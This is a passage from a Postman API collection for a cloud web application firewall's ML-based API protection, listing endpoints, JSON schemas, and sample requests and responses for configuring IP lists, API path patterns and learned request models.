\"idx\": 1,\r\n            \"type\": \"regular\",\r\n            \"pattern\": \"/autotest/.*\"\r\n        },\r\n        {\r\n            \"idx\": 2,\r\n            \"type\": \"plain\",\r\n            \"pattern\": \"/api\"\r\n        }\r\n    ]\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot","description":"\n\n\n<p>Update the information about ML Based API Protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"required\": [\n        \"_status\",\n        \"action\",\n        \"template_status\",\n        \"ip_list_type\",\n        \"source_ip_list\",\n        \"api_path_list\"\n    ],\n    \"properties\": {\n        \"_status\": {\n            \"description\": \"Configure to enable or disable the module\",\n            \"enum\": [\"enable\",\"disable\"]\n        },\n        \"action\": {\n            \"description\": \"Select the action that FortiWeb takes when it detects a violation of the rule\",\n            \"enum\": [\"alert_deny\",\"alert\"]\n        },\n        \"template_status\": {\n            \"description\": \"Configure to enable or disable the module's template status\",\n            \"enum\": [\"enable\",\"disable\"]\n        },\n        \"ip_list_type\": {\n            \"description\": \"Specify the trust or block IPs in IP list\",\n            \"enum\": [\"Trust\",\"Block\"]\n        },\n        \"source_ip_list\": {\n            \"type\": \"array\",\n            \"items\": {\n                \"type\": \"object\",\n                \"properties\": {\n                    \"idx\": {\n                        \"type\": \"integer\"\n                    },\n                    \"ip\": {\n                        \"description\": \"IP or IP range\",\n                        \"type\": \"string\"\n                    }\n                },\n                \"required\": [\n                    \"idx\",\n                    \"ip\"\n                ]\n            },\n            \"maxItems\": 30\n        },\n        \"api_path_list\": {\n            \"type\": \"array\",\n            \"items\": {\n                \"type\": \"object\",\n                \"properties\": {\n                    \"idx\": {\n                        \"type\": \"integer\"\n                    },\n                    \"type\": {\n                        \"description\": \"Type of API path pattern\",\n                        \"enum\": [\"regular\",\"plain\"]\n                    },\n                    \"pattern\": {\n                        \"description\": \"API path pattern\",\n                        \"type\": \"string\"\n                    }\n                },\n                \"required\": [\n                    \"idx\",\n                    \"type\",\n                    \"pattern\"\n                ]\n            },\n            \"maxItems\": 30\n        }\n    }\n}\n</code></pre>\n<p></p>\n<p>After you update the configuration, the API will return successfully.</p>\n\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"05c386e1-19c5-43df-a478-8fa77be189ef","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"3e2f2989-3a4d-4440-b497-6da62ae0c925","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"_status\": \"enable\",\r\n    \"action\": \"alert_deny\",\r\n    \"template_status\": \"disable\",\r\n    \"ip_list_type\": \"Block\",\r\n    \"source_ip_list\": [\r\n        {\r\n            \"idx\": 1,\r\n            \"ip\": \"1.1.1.1\"\r\n        },\r\n        {\r\n            \"idx\": 2,\r\n            \"ip\": \"3.3.3.1-3.3.3.100\"\r\n        }\r\n    ],\r\n    \"api_path_list\": [\r\n        {\r\n            \"idx\": 1,\r\n            \"type\": \"regular\",\r\n            \"pattern\": \"/autotest/.*\"\r\n        },\r\n        {\r\n            \"idx\": 2,\r\n            \"type\": \"plain\",\r\n            \"pattern\": \"/api\"\r\n        }\r\n    ]\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"997214fb-f2e4-4d0f-be0d-9d9ed99dcf69","name":"Fail","originalRequest":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"_status\": \"enable\",\r\n    \"template_status\": \"disable\",\r\n    \"ip_list_type\": \"Block\",\r\n    \"source_ip_list\": [\r\n        {\r\n            \"idx\": 1,\r\n            \"ip\": \"1.1.1.1\"\r\n        },\r\n        {\r\n            \"idx\": 2,\r\n            \"ip\": \"3.3.3.1-3.3.3.100\"\r\n        }\r\n    ],\r\n    \"api_path_list\": [\r\n        {\r\n            \"idx\": 1,\r\n            \"type\": \"regular\",\r\n            \"pattern\": \"/autotest/.*\"\r\n        },\r\n        {\r\n            \"idx\": 2,\r\n            \"type\": \"plain\",\r\n            \"pattern\": \"/api\"\r\n        }\r\n    ]\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"Bad Request","code":400,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\r\n    \"detail\": \"Check failed: {'action': 'must be contained'}\"\r\n}"}],"_postman_id":"4bec968e-c74d-4dc9-bb95-6586d146e5b5"},{"name":"Get ML Based API Protection API Path","id":"1ab2eb9b-25e1-4fd0-b570-264a880e1acf","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_geturl?page={{page}}&period={{period}}&size={{size}}","description":"<p>Get the configuration information of JSON protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot_geturl"],"host":["api","tim","waasonline","com"],"query":[{"description":{"content":"<p>Page number</p>\n","type":"text/plain"},"key":"page","value":"{{page}}"},{"description":{"content":"<p>Attack statistics period, “1day” or “7day”</p>\n","type":"text/plain"},"key":"period","value":"{{period}}"},{"description":{"content":"<p>Page size</p>\n","type":"text/plain"},"key":"size","value":"{{size}}"}],"variable":[{"id":"71de2702-7de6-4a35-b0d7-7f2142a53122","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"5f3878eb-43b1-4fed-8c1a-b31d0db80335","name":"Get API Path List","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot?page={{page}}&size={{size}}&period={{period}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot"],"query":[{"key":"page","value":"{{page}}","description":"Page number"},{"key":"size","value":"{{size}}","description":"Page size"},{"key":"period","value":"{{period}}","description":"Attack statistics period, “1day” or “7day”"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": [\n        {\n            \"id\": 1,\n            \"rule_id\": 126,\n            \"dbid\": 4,\n            \"url_id\": 1,\n            \"path\": \"/autotest/mltest1.json\",\n            \"method\": \"post\",\n            \"status\": \"model running\",\n            \"url_md5\": \"2C91C1D20D169510\",\n            \"block\": 273,\n            \"monitor\": 0\n        },\n        {\n            \"id\": 2,\n            \"rule_id\": 126,\n            \"dbid\": 4,\n            \"url_id\": 2,\n            \"path\": \"/autotest/mltest2.json\",\n            \"method\": \"post\",\n            \"status\": \"model confirmed\",\n            \"url_md5\": \"30CB10EC3A800911\",\n            \"block\": 0,\n            \"monitor\": 0\n        }\n    ],\n    \"total\": 2\n}"},{"id":"41492421-09fa-4b3f-bd80-1b769ddb23e8","name":"Get API Path Detail","originalRequest":{"method":"GET","header":[{"key":"Accept","value":"application/json","type":"text"},{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"}],"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot?url={{page}}&url_md5={{size}}&period={{period}}","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot"],"query":[{"key":"url","value":"{{page}}","description":"URL path of API model"},{"key":"url_md5","value":"{{size}}","description":"MD5 of URL path which returned in get API Path List"},{"key":"period","value":"{{period}}","description":"Attack statistics period, “1day” or “7day”"}],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\",\n    \"result\": {\n        \"id\": 1,\n        \"rule_id\": 126,\n        \"dbid\": 4,\n        \"url_id\": 1,\n        \"path\": \"/autotest/mltest1.json\",\n        \"method\": \"post\",\n        \"status\": \"model confirmed\",\n        \"url_md5\": \"2C91C1D20D169510\",\n        \"parameter\": [\n            {\n                \"description\": \"\",\n                \"in\": \"query\",\n                \"name\": \"single\",\n                \"required\": true,\n                \"schema\": {\n                    \"type\": \"string\",\n                    \"maxLength\": 1,\n                    \"minLength\": 1\n                },\n                \"block\": 0,\n                \"monitor\": 0\n            },\n            {\n                \"description\": \"\",\n                \"in\": \"query\",\n                \"name\": \"arr1\",\n                \"required\": true,\n                \"schema\": {\n                    \"type\": \"array\",\n                    \"items\": {\n                        \"type\": \"string\",\n                        \"maxLength\": 1,\n                        \"minLength\": 1\n                    }\n                },\n                \"block\": 0,\n                \"monitor\": 0\n            },\n            {\n                \"description\": \"\",\n                \"in\": \"query\",\n                \"name\": \"obj\",\n                \"required\": true,\n                \"schema\": {\n                    \"properties\": {\n                        \"role\": {\n                            \"type\": \"string\",\n                            \"maxLength\": 5,\n                            \"minLength\": 5\n                        },\n                        \"firstName\": {\n                            \"type\": \"string\",\n                            \"maxLength\": 8,\n                            \"minLength\": 6\n                        }\n                    },\n                    \"type\": \"object\",\n                    \"required\": [\n                        \"role\",\n                        \"firstName\"\n                    ]\n                },\n                \"block\": 0,\n                \"monitor\": 0\n            }\n        ],\n        \"req_model\": {\n            \"properties\": {\n                \"address\": {\n                    \"type\": \"string\",\n                    \"maxLength\": 5,\n                    \"minLength\": 5\n                },\n                \"size\": {\n                    \"type\": \"number\",\n                    \"maximum\": 102,\n                    \"minimum\": 4\n                },\n                \"object\": {\n                    \"properties\": {\n                        \"where\": {\n                            \"type\": \"string\",\n                            \"maxLength\": 9,\n                            \"minLength\": 9\n                        }\n                    },\n                    \"type\": \"object\",\n                    \"required\": [\n                        \"where\"\n                    ]\n                },\n                \"array\": {\n                    \"type\": \"array\",\n                    \"items\": {\n                        \"type\": \"number\",\n                        \"maximum\": 3,\n                        \"minimum\": 1\n                    },\n                    \"maxItems\": 3,\n                    \"minItems\": 3\n                }\n            },\n            \"type\": \"object\",\n            \"required\": [\n                \"address\",\n                \"size\",\n                \"object\",\n                \"array\"\n            ]\n        },\n        \"resp_model\": {\n            \"type\": \"array\",\n            \"items\": {\n                \"oneOf\": [\n                    {\n                        \"type\": \"number\",\n                        \"maximum\": 100,\n                        \"minimum\": 100\n                    }\n                ]\n            },\n            \"maxItems\": 2,\n            \"minItems\": 2\n        },\n        \"action\": \"alert_deny\",\n        \"block_period\": 600,\n        \"severity\": 3,\n        \"trigger\": 0,\n        \"start_training_cnt\": 100\n    }\n}"}],"_postman_id":"1ab2eb9b-25e1-4fd0-b570-264a880e1acf"},{"name":"Update ML Based API Protection API Path Config","id":"d520833f-6431-4260-a446-dcbc30d2cab5","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"data\": {\r\n        \"method\": \"post\",\r\n        \"action\": \"alert_deny\"\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlconfig","description":"\n\n\n<p>Update URL Path Config of ML Based API Protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n      \"url_md5\": {\n        \"description\": \"MD5 of URL path which returned in response of GET request\",\n        \"type\": \"string\"\n      },\n      \"data\": {\n        \"type\": \"object\",\n        \"properties\": {\n          \"method\": {\n            \"description\": \"HTTP Method of URL Patch\",\n            \"type\": \"string\"\n          },\n          \"action\": {\n            \"description\": \"Select the action that FortiWeb takes when it detects a violation of the rule\",\n            \"enum\": [\"alert_deny\",\"alert\"]\n          }\n        },\n        \"required\": [\n          \"method\",\n          \"action\"\n        ]\n      }\n    },\n    \"required\": [\n      \"url_md5\",\n      \"data\"\n    ]\n}\n</code></pre>\n<p></p>\n<p>After you update the configuration, the API will return successfully.</p>\n\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot_urlconfig"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"05c386e1-19c5-43df-a478-8fa77be189ef","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"456782ad-a630-4ca0-941a-4b1b2c2029fb","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"data\": {\r\n        \"method\": \"post\",\r\n        \"action\": \"alert_deny\"\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlconfig","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_urlconfig"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"d520833f-6431-4260-a446-dcbc30d2cab5"},{"name":"Discard ML Based API Protection API Path","id":"b9f96f24-5c26-4430-b2bf-842fe2a7d2a9","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"data\": {\r\n        \"status\": 7\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlconfig","description":"\n\n\n<p>Discard URL Path of ML Based API Protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n      \"url_md5\": {\n        \"description\": \"MD5 of URL path which returned in response of GET request\",\n        \"type\": \"string\"\n      },\n      \"data\": {\n        \"type\": \"object\",\n        \"properties\": {\n          \"status\": {\n            \"description\": \"This field must be '7'\",\n            \"enum\": [7]\n          }\n        },\n        \"required\": [\n          \"status\"\n        ]\n      }\n    },\n    \"required\": [\n      \"url_md5\",\n      \"data\"\n    ]\n}\n</code></pre>\n<p></p>\n<p>After you update the configuration, the API will return successfully.</p>\n\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot_urlconfig"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"05c386e1-19c5-43df-a478-8fa77be189ef","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"2b6f630d-674a-47f2-9773-b60337b8832d","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"data\": {\r\n        \"status\": 7\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlconfig","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_urlconfig"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"b9f96f24-5c26-4430-b2bf-842fe2a7d2a9"},{"name":"Refresh ML Based API Protection API Path","id":"9d82a5ce-8d57-4f3a-99e8-d8af3db6299c","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\"\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_refreshurl","description":"\n\n\n<p>Refresh URL Path of ML Based API Protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n      \"url_md5\": {\n        \"description\": \"MD5 of URL path which returned in response of GET request\",\n        \"type\": \"string\"\n      }\n    },\n    \"required\": [\n      \"url_md5\"\n    ]\n}\n</code></pre>\n<p></p>\n<p>After you update the configuration, the API will return successfully.</p>\n\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot_refreshurl"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"05c386e1-19c5-43df-a478-8fa77be189ef","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"a71f22ce-f88a-4a1f-aeb7-9a1aabc9bfc5","name":"Success","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\"\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_refreshurl","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_refreshurl"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"9d82a5ce-8d57-4f3a-99e8-d8af3db6299c"},{"name":"Update ML Based API Protection API Path Model","id":"28d3332f-f5f2-4c9e-9fac-c9f67995dcbd","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"PUT","header":[{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"},{"key":"Accept","type":"text","value":"application/json"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"data\": {\r\n        \"model\": {\r\n            \"name\": \"test\",\r\n            \"in\": \"query\",\r\n            \"required\": true,\r\n            \"description\": \"test\",\r\n            \"schema\": {\r\n                \"type\": \"string\",\r\n                \"maxLength\": 1,\r\n                \"minLength\": 1\r\n            }\r\n        },\r\n        \"type\": 1\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlmodel","description":"\n\n\n<p>Update URL Path Model of ML Based API Protection.</p>\n<p>A body including all parameters and values in the request that conforms to the following JSON schema:\n\n</p><pre class=\"click-to-expand-wrapper is-snippet-wrapper\"><code class=\"language-json\">{\n    \"type\": \"object\",\n    \"properties\": {\n      \"url_md5\": {\n        \"description\": \"MD5 of URL path which returned in response of GET request\",\n        \"type\": \"string\"\n      },\n      \"data\": {\n        \"type\": \"object\",\n        \"properties\": {\n          \"model\": {\n            \"description\": \"JSON schema of this Model\",\n            \"type\": \"object\"\n          },\n          \"type\": {\n            \"description\": \"Type of Model, '1' for parameter, '2' for request body, '3' for response body\",\n            \"enum\": [1,2,3]\n          }\n        },\n        \"required\": [\n          \"model\",\n          \"type\"\n        ]\n      }\n    },\n    \"required\": [\n      \"url_md5\",\n      \"data\"\n    ]\n}\n</code></pre>\n<p></p>\n<p>After you update the configuration, the API will return successfully.</p>\n\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot_urlmodel"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"05c386e1-19c5-43df-a478-8fa77be189ef","description":{"content":"<p>The application ID, it can be obtained from List Applications API.</p>\n","type":"text/plain"},"type":"string","value":"{{ep_id}}","key":"ep_id"}]}},"response":[{"id":"35663809-3086-40be-bd43-56bcd56e6269","name":"Create or Update Parameter Model","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"data\": {\r\n        \"model\": {\r\n            \"name\": \"test\",\r\n            \"in\": \"query\",\r\n            \"required\": true,\r\n            \"description\": \"test\",\r\n            \"schema\": {\r\n                \"type\": \"string\",\r\n                \"maxLength\": 1,\r\n                \"minLength\": 1\r\n            }\r\n        },\r\n        \"type\": 1\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlmodel","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_urlmodel"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"e3cba98a-8f83-4989-99df-0b7a30edb0af","name":"Delete Parameter Model","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"action\": \"delete\",\r\n    \"data\": {\r\n        \"model\": {\r\n            \"name\": \"test\",\r\n            \"in\": \"query\",\r\n            \"required\": true,\r\n            \"description\": \"test\",\r\n            \"schema\": {\r\n                \"type\": \"string\",\r\n                \"maxLength\": 1,\r\n                \"minLength\": 1\r\n            }\r\n        },\r\n        \"type\": 1\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlmodel","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_urlmodel"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"1bb72898-dff0-4a03-ae9b-514b19e13c6e","name":"Update Request Body Model","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"data\": {\r\n        \"model\": {\r\n            \"type\": \"object\",\r\n            \"properties\": {\r\n                \"address\": {\r\n                    \"type\": \"string\",\r\n                    \"maxLength\": 5,\r\n                    \"minLength\": 5\r\n                },\r\n                \"size\": {\r\n                    \"type\": \"number\",\r\n                    \"maximum\": 13,\r\n                    \"minimum\": 4\r\n                },\r\n                \"object\": {\r\n                    \"properties\": {\r\n                        \"where\": {\r\n                            \"type\": \"string\",\r\n                            \"maxLength\": 9,\r\n                            \"minLength\": 9\r\n                        }\r\n                    },\r\n                    \"type\": \"object\",\r\n                    \"required\": [\r\n                        \"where\"\r\n                    ]\r\n                },\r\n                \"array\": {\r\n                    \"type\": \"array\",\r\n                    \"items\": {\r\n                        \"type\": \"number\",\r\n                        \"maximum\": 3,\r\n                        \"minimum\": 1\r\n                    },\r\n                    \"maxItems\": 3,\r\n                    \"minItems\": 3\r\n                }\r\n            },\r\n            \"required\": [\r\n                \"address\",\r\n                \"size\",\r\n                \"object\",\r\n                \"array\"\r\n            ]\r\n        },\r\n        \"type\": 2\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlmodel","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_urlmodel"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"},{"id":"fcf95c61-afe8-4ea8-b990-d171acee64dc","name":"Update Response Body Model","originalRequest":{"method":"PUT","header":[{"key":"Authorization","value":"Basic {{api-key-secret}}","type":"text"},{"key":"Accept","value":"application/json","type":"text"},{"key":"Content-Type","name":"Content-Type","value":"application/json","type":"text"}],"body":{"mode":"raw","raw":"{\r\n    \"url_md5\": \"815CB933D5EAD413\",\r\n    \"data\": {\r\n        \"model\": {\r\n            \"type\": \"array\",\r\n            \"items\": {\r\n                \"oneOf\": [\r\n                    {\r\n                        \"type\": \"number\",\r\n                        \"maximum\": 100,\r\n                        \"minimum\": 100\r\n                    }\r\n                ]\r\n            },\r\n            \"maxItems\": 2,\r\n            \"minItems\": 2\r\n        },\r\n        \"type\": 3\r\n    }\r\n}","options":{"raw":{"language":"json"}}},"url":{"raw":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_urlmodel","protocol":"https","host":["api","tim","waasonline","com"],"path":["v1","application",":ep_id","ml_apiprot_urlmodel"],"variable":[{"key":"ep_id","value":"{{ep_id}}","description":"The application ID, it can be obtained from List Applications API."}]}},"status":"OK","code":200,"_postman_previewlanguage":"json","header":[],"cookie":[],"responseTime":null,"body":"{\n    \"detail\": \"successfully\"\n}"}],"_postman_id":"28d3332f-f5f2-4c9e-9fac-c9f67995dcbd"},{"name":"Get ML Based API Protection API View Data","id":"405f78d2-99bd-49cd-a6b5-2a21c9a62469","protocolProfileBehavior":{"disableBodyPruning":true},"request":{"method":"GET","header":[{"key":"Accept","type":"text","value":"application/json"},{"key":"Authorization","type":"text","value":"Basic {{api-key-secret}}"}],"url":"https://api.tim.waasonline.com/v1/application/:ep_id/ml_apiprot_schemafile","description":"<p>Get the configuration information of JSON protection.</p>\n<blockquote>\n<p>Requires API key secret as <code>Authorization</code> request header. See <b>Request format<b> section for API key secret details.</b></b></p>\n</blockquote>\n","urlObject":{"protocol":"https","path":["v1","application",":ep_id","ml_apiprot_schemafile"],"host":["api","tim","waasonline","com"],"query":[],"variable":[{"id":"71de2702-7de6-4a35-b0d7-7f2142a53122","description":{"content":"<p>The application ID, it can be obtained from List Applications 